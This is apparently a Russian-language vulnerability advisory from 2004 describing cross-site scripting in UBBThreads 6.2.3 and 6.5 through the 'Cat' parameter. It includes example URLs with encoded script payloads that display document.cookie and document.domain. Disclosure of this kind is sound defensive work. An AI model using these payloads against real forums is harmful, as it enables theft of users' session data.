Межсайтовое выполнение сценариев в UBBThreads

Дата публикации:
17.12.2004
Дата изменения:
17.10.2006
Всего просмотров:
1119
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: UBBThreads 6.2.3, 6.5

Описание:
Обнаружено межсайтовое выполнение сценариев в UBBThreads. Удаленный атакующий может получить важные данные пользователей.

Уязвимость существует из-за некорректной фильтрации данных в параметре ‘Cat’. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя. Примеры:

[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E %3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SC

[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Eale rt%28document.cookie%29%3B%3C/SC

[forum]/login.php?Cat=[XSS(s.a.)]

[forum]/online.php?Cat=[XSS(s.a.)]

URL производителя: www.ubbcentral.com/ubbthreads/

Решение: Решение не существует на данный момент.

Ссылки: UBBThreads Input Validation Hole in 'Cat' Parameter Lets Remote Users Conduct Cross-Site Scripting Attacks

или введите имя

CAPTCHA